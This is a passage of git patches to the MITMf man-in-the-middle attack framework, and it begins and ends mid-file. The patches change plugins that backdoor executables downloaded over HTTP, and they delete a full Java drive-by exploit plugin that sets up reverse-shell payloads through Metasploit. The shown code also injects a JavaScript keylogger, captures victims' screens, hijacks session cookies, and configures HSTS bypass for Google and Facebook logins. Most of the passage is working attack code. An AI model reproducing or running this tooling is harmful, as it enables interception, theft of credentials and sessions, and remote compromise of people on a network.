cookie_file.close() \ No newline at end of file diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 54bf08a..54ccad6 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -61,6 +61,7 @@ import logging import shutil import random import string +import threading import tarfile import multiprocessing @@ -78,8 +79,7 @@ class FilePwn(Plugin): name = "FilePwn" optname = "filepwn" desc = "Backdoor executables being sent over http using bdfactory" - implements = ["handleResponse"] - tree_output = ["BDFProxy v0.3.2 online"] + tree_info = ["BDFProxy v0.3.2 online"] version = "0.3" has_opts = False @@ -134,17 +134,23 @@ class FilePwn(Plugin): msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary msf.login('msf', rpcpass) version = msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v{}".format(version)) + self.tree_info.append("Connected to Metasploit v{}".format(version)) + + t = threading.Thread(name='setupMSF', target=self.setupMSF, args=(msf,)) + t.setDaemon(True) + t.start() except Exception: sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") + + def setupMSF(self, msf): - self.tree_output.append("Setting up Metasploit payload handlers") jobs = msf.call('job.list') for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: cmd = "use exploit/multi/handler\n" cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) cmd += "set LHOST {}\n".format(config["HOST"]) cmd += "set LPORT {}\n".format(config["PORT"]) + cmd += "set ExitOnSession False\n" cmd += "exploit -j\n" if jobs: @@ -589,46 +595,46 @@ class FilePwn(Plugin): self.patched.put(tempZipFile) return - def handleResponse(self, request, data): + def serverResponse(self, response, request, data): - content_header = request.client.headers['Content-Type'] - client_ip = request.client.getClientIP() + content_header = response.headers['Content-Type'] + client_ip = response.getClientIP() if content_header in self.zipMimeTypes: if self.bytes_have_format(data, 'zip'): - mitmf_logger.info("{} Detected supported zip file type!".format(client_ip)) + mitmf_logger.info("[FilePwn] {} Detected supported zip file type!".format(client_ip)) process = multiprocessing.Process(name='zip', target=self.zip, args=(data,)) process.daemon = True process.start() - process.join() + #process.join() bd_zip = self.patched.get() if bd_zip: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_zip} + mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip)) + return {'response': response, 'request': request, 'data': bd_zip} else: for tartype in ['gz','bz','tar']: if self.bytes_have_format(data, tartype): - mitmf_logger.info("{} Detected supported tar file type!".format(client_ip)) + mitmf_logger.info("[FilePwn] {} Detected supported tar file type!".format(client_ip)) process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,)) process.daemon = True process.start() - process.join() + #process.join() bd_tar = self.patched.get() if bd_tar: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_tar} + mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip)) + return {'response': response, 'request': request, 'data': bd_tar} elif content_header in self.binaryMimeTypes: for bintype in ['pe','elf','fatfile','machox64','machox86']: if self.bytes_have_format(data, bintype): - mitmf_logger.info("{} Detected supported binary type!".format(client_ip)) + mitmf_logger.info("[FilePwn] {} Detected supported binary type ({})!".format(client_ip, bintype)) fd, tmpFile = mkstemp() with open(tmpFile, 'w') as f: f.write(data) @@ -636,15 +642,14 @@ class FilePwn(Plugin): process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) process.daemon = True process.start() - process.join() + #process.join() patchb = self.patched.get() if patchb: bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() os.remove('./backdoored/' + os.path.basename(tmpFile)) - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_binary} + mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip)) + return {'response': response, 'request': request, 'data': bd_binary} - else: - mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header)) - return {'request': request, 'data': data} \ No newline at end of file + mitmf_logger.debug("[FilePwn] {} File is not of supported Content-Type: {}".format(client_ip, content_header)) + return {'response': response, 'request': request, 'data': data} \ No newline at end of file diff --git a/plugins/Inject.py b/plugins/Inject.py index f448b2b..d86b5ef 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -27,46 +27,45 @@ import argparse from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.CacheKill import CacheKill -from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger("mitmf") -class Inject(Plugin): +class Inject(CacheKill, Plugin): name = "Inject" optname = "inject" desc = "Inject arbitrary content into HTML content" - version = "0.2" + version = "0.3" has_opts = True def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.our_ip = SystemConfig.getIP(options.interface) - self.html_src = options.html_url - self.js_src = options.js_url - self.rate_limit = options.rate_limit - self.count_limit = options.count_limit - self.per_domain = options.per_domain - self.black_ips = options.black_ips - self.white_ips = options.white_ips - self.match_str = "" or options.match_str - self.html_payload = options.html_payload - self.ctable = {} - self.dtable = {} - self.count = 0 - self.mime = "text/html" + self.options = options + self.our_ip = SystemConfig.getIP(options.interface) + self.html_src = options.html_url + self.js_src = options.js_url + self.rate_limit = options.rate_limit + self.count_limit = options.count_limit + self.per_domain = options.per_domain + self.black_ips = options.black_ips.split(',') + self.white_ips = options.white_ips.split(',') + self.white_domains = options.white_domains.split(',') + self.black_domains = options.black_domains.split(',') + self.match_str = "" or options.match_str + self.html_payload = options.html_payload + self.ctable = {} + self.dtable = {} + self.count = 0 + self.mime = "text/html" if not options.preserve_cache: - cachekill = CacheKill() - cachekill.initialize(options) - ProxyPlugins.getInstance().addPlugin(cachekill) + CacheKill.initialize(self, options) def serverResponse(self, response, request, data): #We throttle to only inject once every two seconds per client #If you have MSF on another host, you may need to check prior to injection #print "http://" + response.client.getRequestHostname() + response.uri ip, hn, mime = self._get_req_info(response) - if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.our_ip): + if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and self._host_filter(hn) and (hn not in self.our_ip): if (not self.js_src == self.html_src is not None or not self.html_payload == ""): data = self._insert_html(data, post=[(self.match_str, self._get_payload())]) self.ctable[ip] = time.time() @@ -81,20 +80,37 @@ class Inject(Plugin): def _ip_filter(self, ip): - if self.white_ips is not None: - if ip in self.white_ips.split(','): + if self.white_ips[0] != '': + if ip in self.white_ips: return True else: return False - if self.black_ips is not None: - if ip in self.black_ips.split(','): + if self.black_ips[0] != '': + if ip in self.black_ips: return False else: return True return True + def _host_filter(self, host): + + if self.white_domains[0] != '': + if host in self.white_domains: + return True + else: + return False + + if self.black_domains[0] != '': + if host in self.black_domains: + return False + else: + return True + + return True + + def _should_inject(self, ip, hn, mime): if self.count_limit == self.rate_limit is None and not self.per_domain: @@ -153,12 +169,14 @@ class Inject(Plugin): def pluginOptions(self, options): options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.") options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.") - options.add_argument("--html-payload", type=str, default=None, help="String you would like to inject.") + options.add_argument("--html-payload", type=str, default='', help="String you would like to inject.") options.add_argument("--match-str", type=str, default=None, help="String you would like to match and place your payload before. ( by default)") options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.") group = options.add_mutually_exclusive_group(required=False) group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.") group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.") group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.") - group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips") - group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips") + group.add_argument("--white-ips", metavar='IPS', type=str, default='', help="Inject content ONLY for these ips (comma seperated)") + group.add_argument("--black-ips", metavar='IPS', type=str, default='', help="DO NOT inject content for these ips (comma seperated)") + group.add_argument("--white-domains", metavar='DOMAINS', type=str, default='', help="Inject content ONLY for these domains (comma seperated)") + group.add_argument("--black-domains", metavar='DOMAINS', type=str, default='', help="DO NOT inject content for these domains (comma seperated)") diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py deleted file mode 100644 index e563208..0000000 --- a/plugins/JavaPwn.py +++ /dev/null @@ -1,231 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import string -import random -import threading -import sys -import logging - -from time import sleep -from core.msfrpc import Msfrpc -from core.utils import SystemConfig -from plugins.plugin import Plugin -from plugins.BrowserProfiler import BrowserProfiler - -mitmf_logger = logging.getLogger("mitmf") - -class JavaPwn(Plugin): - name = "JavaPwn" - optname = "javapwn" - desc = "Performs drive-by attacks on clients with out-of-date java browser plugins" - tree_output = [] - version = "0.3" - has_opts = False - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.msfip = SystemConfig.getIP(options.interface) - - try: - msfcfg = options.configfile['MITMf']['Metasploit'] - except Exception, e: - sys.exit("[-] Error parsing Metasploit options in config file : {}".format(e)) - - try: - self.javacfg = options.configfile['JavaPwn'] - except Exception, e: - sys.exit("[-] Error parsing config for JavaPwn: {}".format(e)) - - self.msfport = msfcfg['msfport'] - self.rpcip = msfcfg['rpcip'] - self.rpcpass = msfcfg['rpcpass'] - - #Initialize the BrowserProfiler plugin - BrowserProfiler.initialize(self, options) - self.black_ips = [] - - try: - self.msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary - self.msf.login('msf', self.rpcpass) - version = self.msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v{}".format(version)) - except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") - - def onConfigChange(self): - self.initialize(self.options) - - def startThread(self, options): - self.pwn() - - def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning) - return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5)) - - def get_exploit(self, java_version): - exploits = [] - - client_vstring = java_version[:-len(java_version.split('.')[3])-1] - client_uversion = int(java_version.split('.')[3]) - - for ver in self.javacfg['Multi'].iteritems(): - if type(ver[1]) is list: - for list_vers in ver[1]: - - version_string = list_vers[:-len(list_vers.split('.')[3])-1] - update_version = int(list_vers.split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif (client_vstring == version_string): - if client_uversion <= update_version: - exploits.append(ver[0]) - else: - version_string = ver[1][:-len(ver[1].split('.')[3])-1] - update_version = int(ver[1].split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif client_vstring == version_string: - if client_uversion <= update_version: - exploits.append(ver[0]) - - return exploits - - - def injectWait(self, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions - #inject iframe - mitmf_logger.info("{} >> now injecting iframe to trigger exploit".format(client_ip)) - self.html_payload = "".format(self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects - - mitmf_logger.info('{} >> waiting for ze shellz, Please wait...'.format(client_ip)) - - exit = False - i = 1 - while i <= 30: #wait max 60 seconds for a new shell - if exit: - break - shell = self.msf.call('session.list') #poll metasploit every 2 seconds for new sessions - if len(shell) > 0: - for k, v in shell.iteritems(): - if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted - mitmf_logger.info("{} >> Got shell!".format(client_ip)) - self.sploited_ips.append(client_ip) #target successfuly owned :) - self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped - exit = True - break - sleep(2) - i += 1 - - if exit is False: #We didn't get a shell :( - mitmf_logger.info("{} >> session not established after 30 seconds".format(client_ip)) - - self.html_payload = self.get_payload() # restart the BrowserProfiler plugin - - def send_command(self, cmd, vic_ip): - try: - mitmf_logger.info("{} >> sending commands to metasploit".format(vic_ip)) - - #Create a virtual console - console_id = self.msf.call('console.create')['id'] - - #write the cmd to the newly created console - self.msf.call('console.write', [console_id, cmd]) - - mitmf_logger.info("{} >> commands sent succesfully".format(vic_ip)) - except Exception, e: - mitmf_logger.info('{} >> Error accured while interacting with metasploit: {}:{}'.format(vic_ip, Exception, e)) - - def pwn(self): - self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit - while True: - if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled - - brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format - - if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited - - vic_ip = brwprofile['ip'] - - mitmf_logger.info("{} >> client has java version {} installed! Proceeding...".format(vic_ip, brwprofile['java_version'])) - mitmf_logger.info("{} >> Choosing exploit based on version string".format(vic_ip)) - - exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg - - if exploits: - - if len(exploits) > 1: - mitmf_logger.info("{} >> client is vulnerable to {} exploits!".format(vic_ip, len(exploits))) - exploit = random.choice(exploits) - mitmf_logger.info("{} >> choosing {}".format(vic_ip, exploit)) - else: - mitmf_logger.info("{} >> client is vulnerable to {}!".format(vic_ip, exploits[0])) - exploit = exploits[0] - - #here we check to see if we already set up the exploit to avoid creating new jobs for no reason - jobs = self.msf.call('job.list') #get running jobs - if len(jobs) > 0: - for k, v in jobs.iteritems(): - info = self.msf.call('job.info', [k]) - if exploit in info['name']: - mitmf_logger.info('{} >> {} already started'.format(vic_ip, exploit)) - url = info['uripath'] #get the url assigned to the exploit - self.injectWait(self.msf, url, vic_ip) - - else: #here we setup the exploit - rand_port = random.randint(1000, 65535) #generate a random port for the payload listener - rand_url = self.rand_url() - #generate the command string to send to the virtual console - #new line character very important as it simulates a user pressing enter - cmd = "use exploit/{}\n".format(exploit) - cmd += "set SRVPORT {}\n".format(self.msfport) - cmd += "set URIPATH {}\n".format(rand_url) - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform - cmd += "set LHOST {}\n".format(self.msfip) - cmd += "set LPORT {}\n".format(rand_port) - cmd += "exploit -j\n" - - mitmf_logger.debug("command string:\n{}".format(cmd)) - - self.send_command(cmd, vic_ip) - - self.injectWait(rand_url, vic_ip) - else: - #this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert) - mitmf_logger.info("{} >> client is not vulnerable to any java exploit".format(vic_ip)) - mitmf_logger.info("{} >> falling back to the signed applet attack".format(vic_ip)) - - rand_url = self.rand_url() - rand_port = random.randint(1000, 65535) - - cmd = "use exploit/multi/browser/java_signed_applet\n" - cmd += "set SRVPORT {}\n".format(self.msfport) - cmd += "set URIPATH {}\n".format(rand_url) - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" - cmd += "set LHOST {}\n".format(self.msfip) - cmd += "set LPORT {}\n".format(rand_port) - cmd += "exploit -j\n" - - self.send_command(cmd, vic_ip) - self.injectWait(rand_url, vic_ip) - sleep(1) diff --git a/plugins/JsKeylogger.py b/plugins/JsKeylogger.py index 2dceae8..892cc69 100644 --- a/plugins/JsKeylogger.py +++ b/plugins/JsKeylogger.py @@ -18,151 +18,54 @@ # USA # import logging +import re +import random +import string from plugins.plugin import Plugin from plugins.Inject import Inject -from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger("mitmf") -class jskeylogger(Plugin): - name = "Javascript Keylogger" +class jskeylogger(Inject, Plugin): + name = "JSKeylogger" optname = "jskeylogger" desc = "Injects a javascript keylogger into clients webpages" version = "0.2" has_opts = False def initialize(self, options): - inject = Inject() - inject.initialize(options) - inject.html_payload = self.msf_keylogger() - ProxyPlugins.getInstance().addPlugin(inject) + Inject.initialize(self, options) + self.html_payload = self.msf_keylogger() def clientRequest(self, request): - #Handle the plugin output if 'keylog' in request.uri: request.printPostData = False - client_ip = request.client.getClientIP() - raw_keys = request.postData.split("&&")[0] + input_field = request.postData.split("&&")[1] + keys = raw_keys.split(",") - del keys[0]; del(keys[len(keys)-1]) + if keys: + del keys[0]; del(keys[len(keys)-1]) - input_field = request.postData.split("&&")[1] + nice = '' + for n in keys: + if n == '9': + nice += "" + elif n == '8': + nice = nice[:-1] + elif n == '13': + nice = '' + else: + try: + nice += n.decode('hex') + except: + mitmf_logger.error("{} [JSKeylogger] Error decoding char: {}".format(request.client.getClientIP(), n)) - nice = '' - for n in keys: - if n == '9': - nice += "" - elif n == '8': - nice = nice.replace(nice[-1:], "") - elif n == '13': - nice = '' - else: - try: - nice += n.decode('hex') - except: - mitmf_logger.error("{} [{}] Error decoding char: {}".format(client_ip, self.name, n)) - - mitmf_logger.info("{} [{}] Host: {} Field: {} Keys: {}".format(client_ip, self.name, request.headers['host'], input_field, nice)) + mitmf_logger.info("{} [JSKeylogger] Host: {} | Field: {} | Keys: {}".format(request.client.getClientIP(), request.headers['host'], input_field, nice)) def msf_keylogger(self): - #Stolen from the Metasploit module http_javascript_keylogger, modified to work in Android and IOS + keylogger = open("./core/javascript/msfkeylogger.js", "r").read() - payload = """""" - - return payload \ No newline at end of file + return '' diff --git a/plugins/Responder.py b/plugins/Responder.py index 9f72c01..e49bcfe 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -34,7 +34,7 @@ class Responder(Plugin): name = "Responder" optname = "responder" desc = "Poison LLMNR, NBT-NS and MDNS requests" - tree_output = ["NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffie online"] + tree_info = ["NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffie online"] version = "0.2" has_opts = True @@ -88,7 +88,32 @@ class Responder(Plugin): LDAPServer().start(smbChal) if options.analyze: - self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") + self.tree_info.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") + self.IsICMPRedirectPlausible(self.ourip) + + def IsICMPRedirectPlausible(self, IP): + result = [] + dnsip = [] + for line in file('/etc/resolv.conf', 'r'): + ip = line.split() + if len(ip) < 2: + continue + if ip[0] == 'nameserver': + dnsip.extend(ip[1:]) + + for x in dnsip: + if x !="127.0.0.1" and self.IsOnTheSameSubnet(x,IP) == False: + self.tree_info.append("You can ICMP Redirect on this network. This workstation ({}) is not on the same subnet than the DNS server ({})".format(IP, x)) + else: + pass + + def IsOnTheSameSubnet(self, ip, net): + net = net+'/24' + ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16) + netstr, bits = net.split('/') + netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16) + mask = (0xffffffff << (32 - int(bits))) & 0xffffffff + return (ipaddr & mask) == (netaddr & mask) def pluginReactor(self, strippingFactory): reactor.listenTCP(3141, strippingFactory) @@ -100,5 +125,6 @@ class Responder(Plugin): options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "Fingerprint hosts that issued an NBT-NS or LLMNR query") options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier") options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Start the WPAD rogue proxy server") + # Removed these options until I find a better way of implementing them #options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") #options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") diff --git a/plugins/SMBAuth.py b/plugins/SMBAuth.py index ad17a3e..e6657fc 100644 --- a/plugins/SMBAuth.py +++ b/plugins/SMBAuth.py @@ -21,9 +21,8 @@ from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.Inject import Inject -from core.sergioproxy.ProxyPlugins import ProxyPlugins -class SMBAuth(Plugin): +class SMBAuth(Inject, Plugin): name = "SMBAuth" optname = "smbauth" desc = "Evoke SMB challenge-response auth attempts" @@ -33,10 +32,8 @@ class SMBAuth(Plugin): def initialize(self, options): self.target_ip = SystemConfig.getIP(options.interface) - inject = Inject() - inject.initialize(options) - inject.html_payload = self._get_data() - ProxyPlugins.getInstance().addPlugin(inject) + Inject.initialize(options) + self.html_payload = self._get_data() def _get_data(self): return ''\ diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py index 887a6f0..d3753ac 100644 --- a/plugins/SSLstrip+.py +++ b/plugins/SSLstrip+.py @@ -27,12 +27,12 @@ from core.sslstrip.URLMonitor import URLMonitor from core.dnschef.DNSchef import DNSChef class HSTSbypass(Plugin): - name = 'SSLstrip+' - optname = 'hsts' - desc = 'Enables SSLstrip+ for partial HSTS bypass' - version = "0.4" - tree_output = ["SSLstrip+ by Leonardo Nve running"] - has_opts = False + name = 'SSLstrip+' + optname = 'hsts' + desc = 'Enables SSLstrip+ for partial HSTS bypass' + version = "0.4" + tree_info = ["SSLstrip+ by Leonardo Nve running"] + has_opts = False def initialize(self, options): self.options = options diff --git a/plugins/Screenshotter.py b/plugins/Screenshotter.py new file mode 100644 index 0000000..23cb23e --- /dev/null +++ b/plugins/Screenshotter.py @@ -0,0 +1,53 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging +import base64 + +from datetime import datetime +from plugins.Inject import Inject +from plugins.plugin import Plugin + +mitmf_logger = logging.getLogger('mitmf') + +class ScreenShotter(Inject, Plugin): + name = 'ScreenShotter' + optname = 'screen' + desc = 'Uses HTML5 Canvas to render an accurate screenshot of a clients browser' + ver = '0.1' + has_opts = False + + def initialize(self, options): + Inject.initialize(self, options) + self.html_payload = self.get_payload() + + def clientRequest(self, request): + if 'saveshot' in request.uri: + request.printPostData = False + img_file = './logs/{}-{}-{}.png'.format(request.client.getClientIP(), request.headers['host'], datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")) + with open(img_file, 'wb') as img: + img.write(base64.b64decode(request.postData[30:] + '==')) + img.close() + + mitmf_logger.info('{} [ScreenShotter] Saved screenshot to {}'.format(request.client.getClientIP(), img_file)) + + def get_payload(self): + canvas = open("./core/javascript/screenshot.js", "rb").read() + return '' \ No newline at end of file diff --git a/plugins/Spoof.py b/plugins/Spoof.py index a2adfae..086128c 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -32,7 +32,6 @@ class Spoof(Plugin): name = "Spoof" optname = "spoof" desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" - tree_output = list() version = "0.6" has_opts = True @@ -63,7 +62,7 @@ class Spoof(Plugin): arpwatch = ARPWatch(options.gateway, self.myip, options.interface) arpwatch.debug = debug - self.tree_output.append("ARPWatch online") + self.tree_info.append("ARPWatch online") self.protocolInstances.append(arpwatch) arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets) diff --git a/plugins/plugin.py b/plugins/plugin.py index f6a7cde..0d5a324 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -8,10 +8,11 @@ import logging mitmf_logger = logging.getLogger('mitmf') class Plugin(ConfigWatcher, object): - name = "Generic plugin" - optname = "generic" - desc = "" - has_opts = False + name = "Generic plugin" + optname = "generic" + tree_info = list() + desc = "" + has_opts = False def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' diff --git a/requirements.txt b/requirements.txt index 75fc1ad..1df0c6a 100644 --- a/requirements.txt +++ b/requirements.txt @@ -4,10 +4,7 @@ scapy msgpack-python dnspython dnslib -user-agents configobj -pyyaml -ua-parser Pillow pefile ipy @@ -16,4 +13,4 @@ service_identity watchdog impacket capstone -pypcap +pypcap \ No newline at end of file From b9371f7cdcb179aa7d38d6395688906a186d6360 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Sat, 16 May 2015 21:22:11 +0200 Subject: [PATCH 18/20] Screenshotter plugin now live! Added an interval option to specify the interval at which to take the sceenshots Ferret-NG plugin is pretty much set also, was a bit of a dummy and didn't take into account that we would have sessions from multiple clients (duh!) , so I added a section in the config file to specify the client to hijack the sessions from , also added an option to load the cookies from a log file! --- config/mitmf.conf | 35 +++++++++++++--------- core/dnschef/DNSchef.py | 3 +- core/ferretng/ClientRequest.py | 11 +++++-- core/ferretng/URLMonitor.py | 1 + core/javascript/screenshot.js | 2 +- core/protocols/arp/ARPWatch.py | 5 ++-- core/protocols/arp/ARPpoisoner.py | 3 +- core/protocols/smb/SMBserver.py | 3 +- core/utils.py | 12 ++++++-- mitmf.py | 18 ++++------- plugins/BeefAutorun.py | 4 +-- plugins/BrowserSniper.py | 5 ++-- plugins/FerretNG.py | 50 ++++++++++++++++++++++++++----- plugins/FilePwn.py | 3 +- plugins/Responder.py | 6 ++-- plugins/Screenshotter.py | 26 +++++++++++----- plugins/Spoof.py | 13 ++++---- 17 files changed, 130 insertions(+), 70 deletions(-) diff --git a/config/mitmf.conf b/config/mitmf.conf index ce7e7ec..c6a4269 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -103,6 +103,27 @@ [[Regex2]] "I'm Feeling Lucky" = "I'm Feeling Something In My Pants" +[Ferret-NG] + # + # Here you can specify the client to hijack sessions from + # + + Client = '192.168.20.126' + +[SSLstrip+] + + # + #Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com + # + + #for google and gmail + accounts.google.com = account.google.com + mail.google.com = gmail.google.com + accounts.google.se = cuentas.google.se + + #for facebook + www.facebook.com = social.facebook.com + [Responder] #Set these values to On or Off, so you can control which rogue authentication server is turned on. @@ -317,20 +338,6 @@ Plugin = Flash PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144 -[SSLstrip+] - - # - #Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com - # - - #for google and gmail - accounts.google.com = account.google.com - mail.google.com = gmail.google.com - accounts.google.se = cuentas.google.se - - #for facebook - www.facebook.com = social.facebook.com - [FilePwn] # BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' diff --git a/core/dnschef/DNSchef.py b/core/dnschef/DNSchef.py index e1473a2..a65d8cd 100755 --- a/core/dnschef/DNSchef.py +++ b/core/dnschef/DNSchef.py @@ -41,6 +41,7 @@ import logging from configobj import ConfigObj from core.configwatcher import ConfigWatcher +from core.utils import shutdown from dnslib import * from IPy import IP @@ -481,7 +482,7 @@ class DNSChef(ConfigWatcher): self.startUDP() except socket.error as e: if "Address already in use" in e: - sys.exit("\n[-] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port'])) + shutdown("\n[-] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port'])) # Initialize and start the DNS Server def startUDP(self): diff --git a/core/ferretng/ClientRequest.py b/core/ferretng/ClientRequest.py index ac6a80b..c9eeb36 100644 --- a/core/ferretng/ClientRequest.py +++ b/core/ferretng/ClientRequest.py @@ -71,9 +71,14 @@ class ClientRequest(Request): del headers['cache-control'] if 'host' in headers: - if headers['host'] in self.urlMonitor.cookies: - mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host'])) - headers['cookie'] = self.urlMonitor.cookies[headers['host']] + try: + for entry in self.urlMonitor.cookies[self.urlMonitor.hijack_client]: + if headers['host'] == entry['host']: + mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host'])) + headers['cookie'] = entry['cookie'] + except KeyError: + mitmf_logger.error("[Ferret-NG] No captured sessions (yet) from {}".format(self.urlMonitor.hijack_client)) + pass return headers diff --git a/core/ferretng/URLMonitor.py b/core/ferretng/URLMonitor.py index d1381aa..85386f9 100644 --- a/core/ferretng/URLMonitor.py +++ b/core/ferretng/URLMonitor.py @@ -32,6 +32,7 @@ class URLMonitor: # Start the arms race, and end up here... javascriptTrickery = 